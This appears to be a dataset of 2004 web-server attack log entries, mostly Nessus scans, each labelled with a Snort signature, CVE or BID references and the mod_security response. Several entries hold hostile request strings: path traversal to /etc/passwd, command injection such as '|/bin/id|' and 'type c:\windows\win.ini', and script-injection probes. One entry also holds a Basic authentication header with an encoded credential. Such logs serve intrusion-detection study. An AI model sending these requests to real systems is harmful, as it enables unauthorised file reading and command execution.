1574 | CAN-2001-0780 | web-application-attack | WEB-CGI directorypro.cgi attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:37:07 2004] "GET /cgi-bin/directorypro.cgi?want=showcat&show=../../../../../etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/directorypro.cgi?want=showcat&show=../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1575 | | attempted-recon | WEB-MISC Domino mab.nsf access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:16 2004] "GET /mab.nsf HTTP/1.1" 403 291 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/mab.nsf ---------------------------------------- GET /mab.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=83 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1576 | | attempted-recon | WEB-MISC Domino cersvr.nsf access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:16 2004] "GET /cersvr.nsf HTTP/1.1" 403 294 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/cersvr.nsf ---------------------------------------- GET /cersvr.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=87 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1577 | | attempted-recon | WEB-MISC Domino setup.nsf access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:14 2004] "GET /setup.nsf HTTP/1.1" 403 293 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/setup.nsf ---------------------------------------- GET /setup.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1578 | | attempted-recon | WEB-MISC Domino statrep.nsf access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:15 2004] "GET /statrep.nsf HTTP/1.1" 403 295 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/statrep.nsf ---------------------------------------- GET /statrep.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=95 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1579 | | attempted-recon | WEB-MISC Domino webadmin.nsf access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:15 2004] "GET /webadmin.nsf HTTP/1.1" 403 296 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/webadmin.nsf ---------------------------------------- GET /webadmin.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=89 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1580 | | attempted-recon | WEB-MISC Domino events4.nsf access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:16 2004] "GET /events4.nsf HTTP/1.1" 403 295 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/events4.nsf ---------------------------------------- GET /events4.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=85 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1581 | | attempted-recon | WEB-MISC Domino ntsync4.nsf access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:16 2004] "GET /ntsync4.nsf HTTP/1.1" 403 295 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/ntsync4.nsf ---------------------------------------- GET /ntsync4.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=81 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1582 | | attempted-recon | WEB-MISC Domino collect4.nsf access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:17 2004] "GET /collect4.nsf HTTP/1.1" 403 296 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/collect4.nsf ---------------------------------------- GET /collect4.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=79 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1583 | | attempted-recon | WEB-MISC Domino mailw46.nsf access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:17 2004] "GET /mailw46.nsf HTTP/1.1" 403 295 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/mailw46.nsf ---------------------------------------- GET /mailw46.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=77 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1584 | | attempted-recon | WEB-MISC Domino bookmark.nsf access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:17 2004] "GET /bookmark.nsf HTTP/1.1" 403 296 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/bookmark.nsf ---------------------------------------- GET /bookmark.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=75 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1585 | | attempted-recon | WEB-MISC Domino agentrunner.nsf access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:18 2004] "GET /agentrunner.nsf HTTP/1.1" 403 299 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/agentrunner.nsf ---------------------------------------- GET /agentrunner.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=73 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1586 | | attempted-recon | WEB-MISC Domino mail.box access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:18 2004] "GET /mail.box HTTP/1.1" 403 292 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/mail.box ---------------------------------------- GET /mail.box HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=71 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1587 | arachNIDS 265 BID3885 Nessus 10040 CVE-2000-0521 Nessus 10623 | web-application-activity | WEB-MISC cgitest.exe access | Request: 217.160.165.173 - - [Fri Mar 12 22:46:48 2004] "GET /cgi-bin/cgitest.exe HTTP/1.1" 404 299 Handler: cgi-script Error: mod_security: Warning. Pattern match "/cgitest\.exe" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/cgitest.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/cgitest\.exe" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1589 | | web-application-attack | WEB-MISC musicat empower attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:38:07 2004] "GET /cgi-bin/empower?DB=whateverwhatever HTTP/1.1" 403 299 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/empower ---------------------------------------- GET /cgi-bin/empower?DB=whateverwhatever HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1591 | BID3810 Nessus 10837 | web-application-activity | WEB-CGI faqmanager.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:43:24 2004] "GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1592 | Nessus 10838 | web-application-activity | WEB-CGI /fcgi-bin/echo.exe access | Request: 217.160.165.173 - - [Fri Mar 12 22:47:16 2004] "GET /fcgi-bin/echo.exe?foo=<SCRIPT>alert(document.domain)</SCRIPT> HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/fcgi-bin/echo.exe] for 50000 ms ---------------------------------------- GET /fcgi-bin/echo.exe?foo=<SCRIPT>alert(document.domain)</SCRIPT> HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "<[[:space:]]*script" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1594 | CAN-1999-1050 Nessus 10075 | web-application-activity | WEB-CGI FormHandler.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:31:27 2004] "POST /FormHandler.cgi HTTP/1.1" 404 295 Handler: (null) Error: mod_security: Warning. Pattern match "/FormHandler\.cgi" at THE_REQUEST. ---------------------------------------- POST /FormHandler.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, */* Accept-Language: en Content-type: application/x-www-form-urlencodedrealname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=nessus%40nessus.org&redirect=http%3A%2F%2Fwww.nessus.org&recipient=nessus%40nessus.org Host: www.testproxy.net User-Agent: Nessus mod_security-message: Warning. Pattern match "/FormHandler\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1595 | CAN-2000-0122 CAN-2000-0256 Nessus 10376 | web-application-activity | WEB-IIS htimage.exe access | Request: 217.160.165.173 - - [Fri Mar 12 22:46:51 2004] "GET /cgi-bin/htimage.exe HTTP/1.1" 404 299 Handler: cgi-script Error: mod_security: Warning. Pattern match "/htimage\.exe" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/htimage.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/htimage\.exe" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1597 | CVE-1999-0237 Nessus 10098 | web-application-activity | WEB-CGI guestbook.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:50 2004] "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|/bin/id| HTTP/1.1" 404 301 Handler: (null) Error: mod_security: Warning. Pattern match "/guestbook\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-sys/guestbook.cgi?user=cpanel&template=|/bin/id| HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/guestbook\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1599 | BID921 CAN-2000-0054 | web-application-activity | WEB-CGI search.cgi access | Request: 61.237.215.17 - - [Wed Mar 10 00:48:04 2004] "GET http://www.honey-search.com/cgi-bin/smartsearch/search.cgi?keywords=Flowers&username=gu0000 HTTP/1.0" 200 71 Handler: proxy-server Error: mod_security: Warning. Pattern match "/search\.cgi" at THE_REQUEST. ---------------------------------------- GET http://www.honey-search.com/cgi-bin/smartsearch/search.cgi?keywords=Flowers&username=gu0000 HTTP/1.0 Accept: image/gif, image/jpeg, image/x-xbitmap, application/msword, */* Accept-Language: en-us Host: www.honey-search.com Pragma: no-cache Referer: http://www.linkou.con.cn User-Agent: Mozilla/4.5 [en-us] (Win98; I) X-Forwarded-For: 208.65.173.33 mod_security-message: Access denied with code 200. Pattern match "/search" at THE_REQUEST. HTTP/1.0 200 OK Content-Type: text/html X-Cache: MISS from www.testproxy.net Connection: close |
1600 | CVE-2000-0208 | web-application-attack | WEB-CGI htsearch arbitrary configuration file attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:41:20 2004] "GET /cgi-bin/htsearch?-c/nonexistent HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/htsearch] for 50000 ms ---------------------------------------- GET /cgi-bin/htsearch?-c/nonexistent HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/htsearch\?-c" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1602 | CVE-2000-0208 | web-application-activity | WEB-CGI htsearch access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:43 2004] "GET /cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= HTTP/1.1" 404 296 Handler: cgi-script Error: mod_security: Warning. Pattern match "/htsearch" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/htsearch" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1608 | CVE-1999-0264 BID2001 | web-application-attack | WEB-CGI htmlscript attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:38:06 2004] "GET /cgi-bin/htmlscript?../../../../../../../../../etc/passwd HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/htmlscript] for 50000 ms ---------------------------------------- GET /cgi-bin/htmlscript?../../../../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/htmlscript\?\.\./\.\." at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1612 | Nessus 10467 BID1471 CAN-2000-0674 | web-application-attack | WEB-MISC ftp.pl attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:39:07 2004] "GET /cgi-bin/ftp/ftp.pl?dir=../../../../../../etc HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ftp ---------------------------------------- GET /cgi-bin/ftp/ftp.pl?dir=../../../../../../etc HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1614 | CAN-1999-1006 BID879 | attempted-recon | WEB-MISC Novell Groupwise gwweb.exe attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:37:12 2004] "GET /GW5/GWWEB.EXE?HELP=bad-request HTTP/1.1" 403 297 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/GW5 ---------------------------------------- GET /GW5/GWWEB.EXE?HELP=bad-request HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1637 | BID1668 arachNIDS 462 CVE-2000-0853 | attempted-recon | WEB-CGI yabb access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:00 2004] "GET /yabbse/index.php?board=nonexistant727076206 HTTP/1.1" 404 296 Handler: (null) Error: File does not exist: /usr/local/apache/htdocs/yabbse/index.php ---------------------------------------- GET /yabbse/index.php?board=nonexistant727076206 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1645 | BID7214 Nessus 11610 | web-application-activity | WEB-CGI testcgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:08 2004] "GET /cgi-bin/testcgi.exe?<script>x</script> HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/testcgi.exe ---------------------------------------- GET /cgi-bin/testcgi.exe?<script>x</script> HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1646 | | web-application-activity | WEB-CGI test.cgi access | Request: 217.13.212.74 - - [Fri Mar 12 02:01:17 2004] "POST http://earth.prohosting.com/lauril/cgi-bin/test.cgi HTTP/1.0" 200 905 Handler: proxy-server Error: mod_security: Warning. Pattern match "/test\.cgi" at THE_REQUEST. ---------------------------------------- POST http://earth.prohosting.com/lauril/cgi-bin/test.cgi HTTP/1.0 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: ru, en Content-Length: 43 Content-Type: application/x-www-form-urlencoded Host: earth.prohosting.com Pragma: no-cache Proxy-Connection: close Referer: http://earth.prohosting.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 2000; DigExt) mod_security-message: Warning. Pattern match "/test\.cgi" at THE_REQUEST. par1=dhfsdjk&par2=hasdjfhskj&par3=fhasdjfsh HTTP/1.0 200 OK Content-Length: 905 Content-Type: text/html X-Cache: MISS from www.testproxy.net Connection: close |
1648 | Nessus 10173 arachNIDS 219 CA-1996-11 CAN-1999-0509 | attempted-recon | WEB-CGI perl.exe command attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:40:34 2004] "GET /cgi-bin/perl.exe?-v HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/perl.exe] for 50000 ms ---------------------------------------- GET /cgi-bin/perl.exe?-v HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/perl\.exe\?" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1649 | Nessus 10173 arachNIDS 219 CA-1996-11 CAN-1999-0509 | attempted-recon | WEB-CGI perl command attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:40:29 2004] "GET /cgi-bin/perl?-v HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/perl] for 50000 ms ---------------------------------------- GET /cgi-bin/perl?-v HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/perl\?" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1650 | BID770 CAN-1999-0885 | web-application-activity | WEB-CGI tst.bat access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:56 2004] "GET /cgi-bin/tst.bat|type%20c:\windows\win.ini HTTP/1.1" 404 319 Handler: cgi-script Error: mod_security: Warning. Pattern match "/tst\.bat" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/tst.bat|type%20c:\windows\win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/tst\.bat" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1653 | BID1975 | web-application-activity | WEB-CGI campus access | Request: 69.105.196.251 - - [Sat Mar 13 13:10:34 2004] "GET http://www.greatsexu.com/hallways/campusjump.html HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://www.greatsexu.com/hallways/campusjump.html] for 50000 ms ---------------------------------------- GET http://www.greatsexu.com/hallways/campusjump.html HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Authorization: Basic ZW1taXR0dHQ6c21pdGgyMg== Host: www.greatsexu.com Referer: <NONE> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4b) Gecko/20030516 Mozilla Firebird/0.6 mod_security-message: Access denied with code 200. Pattern match "Basic" at HEADER. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
1656 | | web-application-activity | WEB-CGI pfdispaly.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:39 2004] "GET /cgi-bin/pfdispaly.cgi?../../../../../../etc/passwd HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/pfdispaly.cgi ---------------------------------------- GET /cgi-bin/pfdispaly.cgi?../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1658 | Nessus 10591 BID1864 CAN-2000-0940 | web-application-activity | WEB-CGI pagelog.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:36:47 2004] "GET /cgi-bin/pagelog.cgi HTTP/1.1" 404 299 Handler: cgi-script Error: mod_security: Warning. Pattern match "/pagelog\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/pagelog.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/pagelog\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
